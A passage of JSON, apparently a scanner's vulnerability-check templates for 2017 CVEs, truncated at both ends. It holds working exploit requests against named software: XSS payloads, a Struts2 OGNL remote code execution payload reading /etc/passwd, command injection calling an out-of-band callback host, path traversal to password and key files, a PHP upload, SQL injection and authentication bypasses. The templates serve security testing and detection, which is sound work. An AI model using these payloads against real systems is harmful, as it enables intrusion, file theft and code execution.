\"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"PDF & Print by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-17562","info":{"name":"Embedthis GoAhead <3.6.5 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"payloads":{"endpoint":["admin","apply","non-CA-rev","cgitest","checkCookie","check_user","chn/liveView","cht/liveView","cnswebserver","config","configure/set_link_neg","configure/swports_adjust","eng/liveView","firmware","getCheckCode","get_status","getmac","getparam","guest/Login","home","htmlmgr","index","index/login","jscript","kvm","liveView","login","login.asp","login/login","login/login-page","login_mgr","luci","main","main-cgi","manage/login","menu","mlogin","netbinary","nobody/Captcha","nobody/VerifyCode","normal_userLogin","otgw","page","rulectl","service","set_new_config","sl_webviewer","ssi","status","sysconf","systemutil","t/out","top","unauth","upload","variable","wanstatu","webcm","webmain","webproc","webscr","webviewLogin","webviewLogin_m64","webviewer","welcome"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["environment variable","display library search paths"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18529","info":{"name":"PromoBar by BestWebSoft < 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/promobar/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"PromoBar by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18490","info":{"name":"Contact Form Multi by BestWebSoft < 1.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/contact-form-multi/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Contact Form Multi by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18494","info":{"name":"Custom Search by BestWebSoft < 1.36 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Custom Search by\")"],"condition":"and"}]}]},{"id":"CVE-2017-3528","info":{"name":"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"],"matchers":[{"type":"word","part":"body","words":["noresize src=\"/\\interact.sh?configName="]}]}]},{"id":"CVE-2017-18590","info":{"name":"Timesheet Plugin < 0.1.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body, \"/wp-content/plugins/timesheet\")"],"internal":true}]},{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")"],"condition":"and"}]}]},{"id":"CVE-2017-12542","info":{"name":"HPE Integrated Lights-out 4 (ILO4) <2.53 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/rest/v1/AccountService/Accounts"],"headers":{"Connection":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAA"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["iLO User"]},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14524","info":{"name":"OpenText Documentum Administrator 7.2.0180.0055 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/xda/help/en/default.htm?startat=//oast.me"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_]*\\.)?oast\\.me(?:\\s*?)$"]}]}]},{"id":"CVE-2017-15363","info":{"name":"Luracast Restler 3.0.1 via TYPO3 Restler 1.7.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<?php","'host'","'database'","'extConf'","'debug'"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18556","info":{"name":"Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google Analytics by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18024","info":{"name":"AvantFAX 3.3.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin&password=admin&_submit_check=1&jlbqg<script>alert(\"{{randstr}}\")</script>b7g0x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(\"{{randstr}}\")</script>","AvantFAX"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-0929","info":{"name":"DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-4011","info":{"name":"McAfee Network Data Loss Prevention 9.3.x - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var ua='Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1';alert(/XSS/);//"]},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2017-12611","info":{"name":"Apache Struts2 S2-053 - Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18493","info":{"name":"Custom Admin Page by BestWebSoft < 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Custom Admin Page by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18536","info":{"name":"WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["forbidden - number in author","</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16894","info":{"name":"Laravel <5.5.21 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.env"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["APP_NAME=","APP_DEBUG=","DB_PASSWORD="],"condition":"and"},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18518","info":{"name":"SMTP by BestWebSoft < 1.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"SMTP by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-9288","info":{"name":"WordPress Raygun4WP <=1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/raygun4wp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Raygun4WP","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-1000029","info":{"name":"Oracle GlassFish Server Open Source Edition 3.0.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/resource/file%3a///etc/passwd/"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7921","info":{"name":"Hikvision - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/system/deviceInfo?auth=YWRtaW46MTEK"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<firmwareVersion>"]},{"type":"word","part":"header","words":["application/xml"]}]}]},{"id":"CVE-2017-6090","info":{"name":"PhpColl 2.5.1 Arbitrary File Upload","severity":"high"},"requests":[{"raw":["POST /clients/editclient.php?id={{randstr}}&action=update HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------154934846911423734231554128137\n\n-----------------------------154934846911423734231554128137\nContent-Disposition: form-data; name=\"upload\"; filename=\"{{randstr}}.php\"\nContent-Type: application/x-php\n\n<?php echo md5(\"{{string}}\");unlink(__FILE__);?>\n\n-----------------------------154934846911423734231554128137--\n","GET /logos_clients/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-5689","info":{"name":"Intel Active Management - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","GET /hw-sys.htm HTTP/1.1\nHost: {{Hostname}}\n"],"digest-username":"admin","matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["System Status","Active Management Technology"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11610","info":{"name":"XML-RPC Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /RPC2 HTTP/1.1\nHost: {{Hostname}}\nAccept: text/xml\nContent-type: text/xml\n\n<methodCall>\n  <methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>\n  <params>\n    <param>\n      <string>nslookup {{interactsh-url}}</string>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"header","words":["text/xml"]},{"type":"word","part":"body","words":["<methodResponse>","<int>"],"condition":"and"}]}]},{"id":"CVE-2017-3131","info":{"name":"FortiOS 5.4.0 to 5.6.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /logincheck HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/plain;charset=UTF-8\n\najax=1&username={{username}}&secretkey={{password}}\n","GET /ng/fortiview/app/15832%22%20onmouseover=alert(document.domain)%20x=%22y HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["id_15832\" onmouseover=\"alert(document.domain)\""]},{"type":"word","part":"content_type_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11165","info":{"name":"DataTaker DT80 dEX 1.50.012 - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/getFile.cmd?userfile=config.xml"],"matchers-condition":"and","matchers":[{"type":"word","words":["COMMAND_SERVER","<loggerSettings>","config id=\"config"],"condition":"and"},{"type":"word","part":"header","words":["text/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9841","info":{"name":"PHPUnit - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n","GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/html\n\n<?php echo md5(\"{{string}}\");?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(string)}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-12794","info":{"name":"Django Debug Page - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/create_user/?username=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14135","info":{"name":"OpenDreambox 2.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/bin/sh","/usr/script"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11512","info":{"name":"ManageEngine ServiceDesk 9.3.9328 - Arbitrary File Retrieval","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/fosagent/repl/download-file?basedir=4&filepath=..\\..\\Windows\\win.ini","{{BaseURL}}/fosagent/repl/download-snapshot?name=..\\..\\..\\..\\..\\..\\..\\Windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2017-14622","info":{"name":"WordPress 2kb Amazon Affiliates Store <2.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=kbAmz&kbAction=demo%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 500","contains(content_type_2, \"text/html\")","contains(body_2, \"<script>alert(document.domain)</script>\")","contains(body_2, \"2kb-amazon-affiliates-store\")"],"condition":"and"}]}]},{"id":"CVE-2017-18517","info":{"name":"Pinterest by BestWebSoft < 1.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Pinterest by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18564","info":{"name":"Sender by BestWebSoft < 1.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/sender/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Sender by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-18500","info":{"name":"Social Buttons Pack by BestWebSof < 1.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Social Buttons Pack by\")"],"condition":"and"}]}]},{"id":"CVE-2017-9140","info":{"name":"Reflected XSS - Telerik Reporting Module","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Telerik.ReportViewer.axd?optype=Parameters&bgColor=_000000%22onload=%22prompt(1)"],"matchers-condition":"and","matchers":[{"type":"word","words":["#000000\"onload=\"prompt(1)","Telerik.ReportViewer.axd?name=Resources"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-14535","info":{"name":"Trixbox - 2.8.0.4 OS Command Injection","severity":"high"},"requests":[{"raw":["GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAuthorization: Basic bWFpbnQ6cGFzc3dvcmQ=\nConnection: close\nCache-Control: max-age=0\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18505","info":{"name":"BestWebSoft's Twitter < 2.55 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Twitter Button by\")"],"condition":"and"}]}]},{"id":"CVE-2017-8917","info":{"name":"Joomla! <3.7.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2017-10974","info":{"name":"Yaws 1.91 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%5C../ssl/yaws-key.pem"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), \"<html\")"]},{"type":"word","words":["BEGIN RSA PRIVATE KEY"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18527","info":{"name":"Pagination by BestWebSoft < 1.0.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/pagination/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Pagination by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-17736","info":{"name":"Kentico - Installer Privilege Escalation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSInstall/install.aspx"],"matchers-condition":"or","matchers":[{"type":"word","words":["Kentico","Database Setup","SQLServer"],"condition":"and"},{"type":"word","words":["Database Setup","SQLServer"],"condition":"and"}]}]},{"id":"CVE-2017-9833","info":{"name":"BOA Web Server 0.94.14 - Arbitrary File Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-17059","info":{"name":"WordPress amtyThumb Posts 8.1.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Amty Thumb","Tags:"],"condition":"and","case-insensitive":true}]},{"method":"POST","path":["{{BaseURL}}/wp-content/plugins/amty-thumb-recent-post/amtyThumbPostsAdminPg.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E=1"],"body":"amty_hidden=1","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7615","info":{"name":"MantisBT <=2.30 - Arbitrary Password Reset/Admin Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantis/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash=","{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash=","{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18557","info":{"name":"Google Maps by BestWebSoft < 1.3.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Google Maps by BestWebSoft\")"],"condition":"and"}]}]},{"id":"CVE-2017-9791","info":{"name":"Apache Struts2 S2-053 - Remote Code 